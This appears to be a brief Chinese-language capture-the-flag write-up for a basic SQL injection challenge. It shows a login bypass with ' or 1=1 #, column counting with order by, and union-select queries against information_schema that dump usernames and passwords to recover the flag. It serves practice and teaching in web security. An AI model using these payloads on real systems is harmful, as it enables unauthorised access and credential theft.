一道难度不大的基础题。。。  

用' or 1=1 #来登录绕过（密码随便）

 成功进入页面

 先测试他能显示结果能有多少列（'order by 1#）//从一开始慢慢试，这里最多显示3行

知道能显示3行，那么用' union selcet 1,2,3可以看到显示为。（说明2，3行能显示内容）

接下来就很简单了，需要探的信息直接改变2，3 的值。如图用database()来获取数据库名

 

(select group_concat(table_name) from information_schema.tables where table_schema='geek')
//查询数据库里面的表名

(select group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1')
//查询相关的列名 

group_concat(concat_ws(id,username,password)) from geekuser

group_concat(concat_ws(id,username,password)) from l0ve1ysq1

 

 用这俩来查讯表内的内容，就能查到flag